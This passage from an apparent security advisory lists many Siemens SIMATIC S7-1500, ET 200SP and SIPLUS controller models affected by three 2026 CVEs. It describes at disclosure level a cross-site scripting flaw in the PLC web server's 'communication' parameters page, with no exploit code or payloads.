(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S T V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S TF V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller Linux V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller Linux V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-PLCSIM Advanced vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) CVSS Vendor Equipment Vulnerabilities v3 9.1 Siemens Siemens SIMATIC S7 PLC Web Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Background Critical Infrastructure Sectors: Chemical, Energy, Food and Agriculture, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-25786 Affected devices do not properly validate and sanitize PLC/station name rendered on the "communication" parameters page of the web interface. This could allow an authenticated attacker who is authorized to download a TIA project into the product, to inject malicious scripts into the page. If a benign user with appropriate rights accesses the "communication" parameters page, the malicious code would be executed in the scope of their web session. View CVE Details Affected Products Siemens SIMATIC S7 PLC Web Server Vendor: Siemens Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 